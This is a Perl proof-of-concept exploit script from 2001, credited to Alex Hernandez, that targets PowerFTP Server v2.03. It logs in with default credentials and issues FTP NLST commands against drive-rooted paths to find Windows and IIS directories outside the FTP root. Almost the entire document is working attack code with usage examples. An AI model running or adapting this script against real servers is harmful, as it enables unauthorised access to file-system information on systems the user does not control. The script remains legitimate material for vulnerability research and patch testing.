#!/usr/bin/perl # Simple script to view the files from the ftp server, # even if they are outside of root directory. # # This script assume OS WinNT/2k/W.x and it looked # for directories of IIS. # # PowerFTP Server v2.03 proof-of-concept exploit # By Alex Hernandez (C)2001. # # Thanks all the people from Spain and Argentina. # Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, # G.Maggiotti & H.Oliveira. # # # Usage: perl -x PowerFTP_data.pl -s # # Examples: # # perl -x PowerFTP_data.pl -s 10.0.0.1 -l temp -p temp # perl -x PowerFTP_data.pl -s 10.0.0.1 # use Getopt::Std; use IO::Socket; print("\nPowerFTP server v2.03 Data revealing exploit (c)2001\n"); print("Alex Hernandez al3xhernandez\@ureach.com\n\n"); getopts('s:l:p:',\%args); my ($CRLF,$port,$login,$pass,$win,$iis,@drives,$dir,$sock_res); $CRLF = "\015\012"; @drives = ("c","d","e"); #Possible drives remotes # If u needed read the drive A floopy add this line # @drives = ("a","c","d","e","f".......etc,etc $port = 21; $login = 'temp'; #Maybe u needed to change this $pass = 'temp'; #Maybe u needed to change this if (defined $args{s}) { $host = $args{s}; } else { print "No host specified.\n"; print "Usage: $0 -s -l -p \n\n";exit; } if (defined $args{l}) { $login = $args{l}; } if (defined $args{p}) { $pass = $args{p}; } $sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$host,PeerPort=>$port) || die("Socket errors: $!"); $sock_res = <$sock>; print $sock "USER $login" . $CRLF; $sock_res = <$sock>; print $sock "PASS $pass" . $CRLF; $sock_res = <$sock>; if ($sock_res !~ /230\s/) { print "Login/password not accepted...exiting.\n"; close($sock); exit; } print $sock "PWD" . $CRLF; $sock_res = <$sock>; print "Attempting to locate system files..."; $win = &OS; $iis = &IIS; print "done..\n\n"; close($sock); print "Windows directory: $win\n"; print "IIS dorectory: $iis\n"; print "Try manually on FTPserver $host: dir c:/\n\n"; exit; sub OS { my @win_dirs = ("win","windows","winnt","winme"); foreach $drive (@drives) { foreach $dir (@win_dirs) { print "."; print $sock "NLST $drive:/$dir/" . $CRLF; $sock_res = <$sock>; if ($sock_res =~ /213\s/) {return("$drive:\\$dir");} } } return("not found"); } sub IIS { my @iis_files = ("Inetpub/wwwroot/", "Inetpub/wwwroot/cgi-bin/"); foreach $drive (@drives) { foreach $file (@iis_files) { print "."; print $sock "NLST $drive:/$file" . $CRLF; $sock_res = <$sock>; if ($sock_res =~ /213\s/) { $file =~ s/\//\\/g; return("$drive:\\$file"); } } } return("not found"); }